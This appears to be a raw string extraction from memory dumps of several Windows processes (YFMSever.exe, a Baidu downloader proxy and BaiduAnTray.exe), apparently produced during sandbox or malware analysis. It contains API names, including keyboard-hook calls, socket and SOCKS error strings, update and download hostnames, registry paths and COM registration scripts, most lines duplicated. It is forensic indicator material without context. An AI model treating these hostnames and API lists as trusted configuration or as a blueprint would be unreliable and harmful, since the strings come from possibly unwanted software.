X.VO/
.JXZp
.JXZp
Q0.EL
Q0.EL
.DO@U
.DO@U
3
3
.LF;F
.LF;F
.JGHU
.JGHU
.ZO4XxS
.ZO4XxS
.uVX?
.uVX?
>.GB
>.GB
.GPF?J
.GPF?J
<.mg>
<.mg>
InternetOpenUrlA
InternetOpenUrlA
*o.eIv
*o.eIv
EnumThreadWindows
EnumThreadWindows
user32.dll
user32.dll
RegQueryInfoKeyA
RegQueryInfoKeyA
ActivateKeyboardLayout
ActivateKeyboardLayout
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
RegFlushKey
RegFlushKey
GetKeyboardLayoutList
GetKeyboardLayoutList
The ordinal %u could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
DeleteUrlCacheEntry
DeleteUrlCacheEntry
iphlpapi.dll
iphlpapi.dll
GetKeyboardLayout
GetKeyboardLayout
RegOpenKeyExA
RegOpenKeyExA
MapVirtualKeyA
MapVirtualKeyA
errorUrl
errorUrl
20.20.20.20
20.20.20.20
JPEG error #%d
JPEG error #%d
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Socket operation on non-socket.
Socket operation on non-socket.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
%s is not a valid service.
Socket Error # %d
Socket Error # %d
%s is not a valid IP address.
%s is not a valid IP address.
Operation would block.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
No data to read.$Can not bind in port range (%d - %d)
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Resolving hostname %s.
Connecting to %s.
Connecting to %s.
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help keyword specified.
No help keyword specified.
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Unsupported clipboard format
$''%s'' is not a valid component name
$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Unable to write to %s
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
YFMSever.exe_2388_rwx_00565000_00001000:
GetCPInfo
GetCPInfo
YFMSever.exe_2388_rwx_00578000_00002000:
kernel32.dll
kernel32.dll
GetKeyState
GetKeyState
SHFileOperationA
SHFileOperationA
UnhookWindowsHookEx
UnhookWindowsHookEx
YFMSever.exe_2388_rwx_0057B000_00001000:
Dadvapi32.dll
Dadvapi32.dll
CreateIoCompletionPort
CreateIoCompletionPort
EnumWindows
EnumWindows
RegCreateKeyExA
RegCreateKeyExA
wininet.dll
wininet.dll
bddownloader.exe_2820:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
8%uvP
8%uvP
;*u.SUj
;*u.SUj
PSSSSSSh
PSSSSSSh
>.uTV
>.uTV
j SSSSSSSh
j SSSSSSSh
aSSSh
aSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
YYtCP
YYtCP
asio.ssl
asio.ssl
asio.misc
asio.misc
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.misc error
asio.ssl error
asio.ssl error
dtrp.download.iyuntian.com
dtrp.download.iyuntian.com
res.download.iyuntian.com
res.download.iyuntian.com
tk.download.iyuntian.com
tk.download.iyuntian.com
utk.download.iyuntian.com
utk.download.iyuntian.com
thread.exit_event
thread.exit_event
thread.entry_event
thread.entry_event
%s\Connection
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.baidu.com.cn
VVV.baidu.com.cn
HTTP/1.1
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
%s>
%s>
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
X;
X;
%s='%s'
%s='%s'
%s="%s"
%s="%s"
PKEY_CUSTOMNAME
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_START_STATUS
PKEY_GUID
PKEY_GUID
PKEY_MINORVERSION
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_EXEVERSION
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
PKEY_UPDATESERVERIP
PKEY_PSHASH
PKEY_PSHASH
PKEY_PSNAME
PKEY_PSNAME
PKEY_EXHASH
PKEY_EXHASH
PKEY_EXNAME
PKEY_EXNAME
PKEY_TNHASH
PKEY_TNHASH
PKEY_TNNAME
PKEY_TNNAME
PKEY_COREHASH
PKEY_COREHASH
PKEY_CORENAME
PKEY_CORENAME
PKEY_EXEHASH
PKEY_EXEHASH
PKEY_EXENAME
PKEY_EXENAME
PKEY_UPDATEURL
PKEY_UPDATEURL
PKEY_FILENAME
PKEY_FILENAME
PKEY_RESULT
PKEY_RESULT
up.download.iyuntian.com
up.download.iyuntian.com
PKEY_TTL
PKEY_TTL
PKEY_ISFIX
PKEY_ISFIX
PKEY_VERSION
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_FILECORE_NAME
PKEY_URL
PKEY_URL
PKEY_PERIOD
PKEY_PERIOD
kernel32.dll
kernel32.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
portuguese-brazilian
portuguese-brazilian
FhModule = %u, pfunc = %u
FhModule = %u, pfunc = %u
DbgHelp.dll
DbgHelp.dll
crash.dmp
crash.dmp
0xX
0xX
DlBugReport.ini
DlBugReport.ini
DlBugReport.dat
DlBugReport.dat
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
%d.%d.%d.%d
%d.%d.%d.%d
,d-d-d d:d:d
,d-d-d d:d:d
[ 0xX ] %s [%s]
[ 0xX ] %s [%s]
Error: Write address 0xX
Error: Write address 0xX
Error: Read address 0xX
Error: Read address 0xX
version = %s
version = %s
%s-----------------------------------
%s-----------------------------------
Type: %s
Type: %s
Address: 0xX
Address: 0xX
bddownloader.exe
bddownloader.exe
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
EXCEPTION_FLT_DENORMAL_OPERAND
(%d,%d,%d,%d)
(%d,%d,%d,%d)
0xX:
0xX:
%s::x;
%s::x;
0xX[%X] %s:
0xX[%X] %s:
%s::x
%s::x
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyW
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
NetWkstaTransportEnum
NetWkstaTransportEnum
NETAPI32.dll
NETAPI32.dll
PSAPI.DLL
PSAPI.DLL
imagehlp.dll
imagehlp.dll
zcÃ
zcÃ
'DownloadProxy.EXE'
'DownloadProxy.EXE'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
BDDownloadProxy.Downloader = s 'Downloader Class'
BDDownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'BDDownloadProxy.Downloader.1'
CurVer = s 'BDDownloadProxy.Downloader.1'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ProgID = s 'BDDownloadProxy.Downloader.1'
ProgID = s 'BDDownloadProxy.Downloader.1'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
stdole2.tlbWWW
cuiMsgTypeWWW
cuiMsgTypeWWW
pMsgParamWWWd
pMsgParamWWWd
6|pTaskUrl
6|pTaskUrl
Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014
Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
"7,,11,,7"
2222222222222222
2222222222222222
11///20.
11///20.
##!!! !!!##
##!!! !!!##
.02///11
.02///11
mM............................................................Mm
mM............................................................Mm
mM..........................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
(((((((JgT..TgJ(((((((
ÿfH
ÿfH
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
bdpunchproxy.dll
bdpunchproxy.dll
bddownload_config.xml
bddownload_config.xml
dl.dll
dl.dll
\bddownloader.exe
\bddownloader.exe
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
CLSID\%s\LocalServer32
{%X-%X-%X-%X-%X%X}
{%X-%X-%X-%X-%X%X}
Mscoree.dll
Mscoree.dll
BDDownloadProxy.Downloader.1
BDDownloadProxy.Downloader.1
\Installlog.txt
\Installlog.txt
\bdcomproxy.dll
\bdcomproxy.dll
\7z.dll
\7z.dll
\bdpunchproxy.dll
\bdpunchproxy.dll
\dl.dll
\dl.dll
regsvr32.exe
regsvr32.exe
Kernel32.dll
Kernel32.dll
7z.dll
7z.dll
C\StringFileInfo\xx\
C\StringFileInfo\xx\
netsh.exe
netsh.exe
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
oiphlpapi.dll
oiphlpapi.dll
\Global.db
\Global.db
PBDD_Temp_Exe
PBDD_Temp_Exe
%*.*f
%*.*f
: %s/s
: %s/s
%s: %s
%s: %s
\TDConfig.ini
\TDConfig.ini
H\set.log
H\set.log
c:\program files\common files\baidu\bddownload\107\bddownloader.exe
c:\program files\common files\baidu\bddownload\107\bddownloader.exe
(1-10240)
(1-10240)
1.0.107.0
1.0.107.0
baiduanTray.exe_2772:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
u%SVW
u%SVW
;9u.SWj
;9u.SWj
8.uwS
8.uwS
n<.ut>
n<.ut>
;:u.SWj
;:u.SWj
SSSSSh
SSSSSh
L$.UQf
L$.UQf
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\message_lite.cc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\coded_stream.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\generated_message_reflection.cc
..\src\google\protobuf\descriptor.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
". To use it here, please add the necessary import.
", which is not imported by "
", which is not imported by "
$0$1 = $2
$0$1 = $2
$0$1 $2 $3 = $4
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.PLACEHOLDER_VALUE
.placeholder.proto
.placeholder.proto
map key must name a scalar or string field.
map key must name a scalar or string field.
map_key must not name a repeated field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
CHECK failed: dynamic.get() != NULL:
.foo = value".
.foo = value".
.dummy
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
" is repeated. Repeated options are not supported.
Import "
Import "
Missing field: FileDescriptorProto.name.
Missing field: FileDescriptorProto.name.
File recursively imports itself:
File recursively imports itself:
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
\xx
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\extension_set.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\descriptor.pb.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
unsupported version
unsupported version
.\filedispatch\FileDispatch.pb.cc
.\filedispatch\FileDispatch.pb.cc
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
config_service.proto
config_service.proto
.\BDMConfig\Protocol\config_service.pb.cc
.\BDMConfig\Protocol\config_service.pb.cc
config_service.proto"(
config_service.proto"(
cmd_list
cmd_list
.ConfigItem"@
.ConfigItem"@
.ResultSet
.ResultSet
Content-Length:%d
Content-Length:%d
s.x.baidu.com
s.x.baidu.com
c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
.\update.pb.cc
%s:%u
%s:%u
%u.%u.%u.%u
%u.%u.%u.%u
addr %s not good...
addr %s not good...
Unsupported Media Type
Unsupported Media Type
HTTP Version not supported
HTTP Version not supported
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
1.0.0.1
1.0.0.1
.\header.pb.cc
.\header.pb.cc
https
https
ftpes
ftpes
ftps
ftps
tftp
tftp
% ;?:@=&,$/-_!.~*()
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb
c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb
BDMSkin.dll
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDLogicUtils.dll
?BDMRegSmartCreateKey@BDMRegisterUtils@@YAHPB_WKPAPAUHKEY__@@PAK@Z
?BDMRegSmartCreateKey@BDMRegisterUtils@@YAHPB_WKPAPAUHKEY__@@PAK@Z
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z
BDMBase.dll
BDMBase.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
BDMFrameWork.dll
BDMStringUtils.dll
BDMStringUtils.dll
?BDMMsgGetModule@@YGJPAPAX@Z
?BDMMsgGetModule@@YGJPAPAX@Z
BDMMsg.dll
BDMMsg.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
MSVCP80.dll
MSVCP80.dll
MSVCR80.dll
MSVCR80.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
PSAPI.DLL
PSAPI.DLL
WTSAPI32.dll
WTSAPI32.dll
USERENV.dll
USERENV.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpQueryInfoW
HttpQueryInfoW
HttpSendRequestW
HttpSendRequestW
WININET.dll
WININET.dll
NETAPI32.dll
NETAPI32.dll
WS2_32.dll
WS2_32.dll
BDMTinyXml.dll
BDMTinyXml.dll
GetProcessHeap
GetProcessHeap
RegOpenKeyExA
RegOpenKeyExA
BaiduAnTray.exe
BaiduAnTray.exe
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
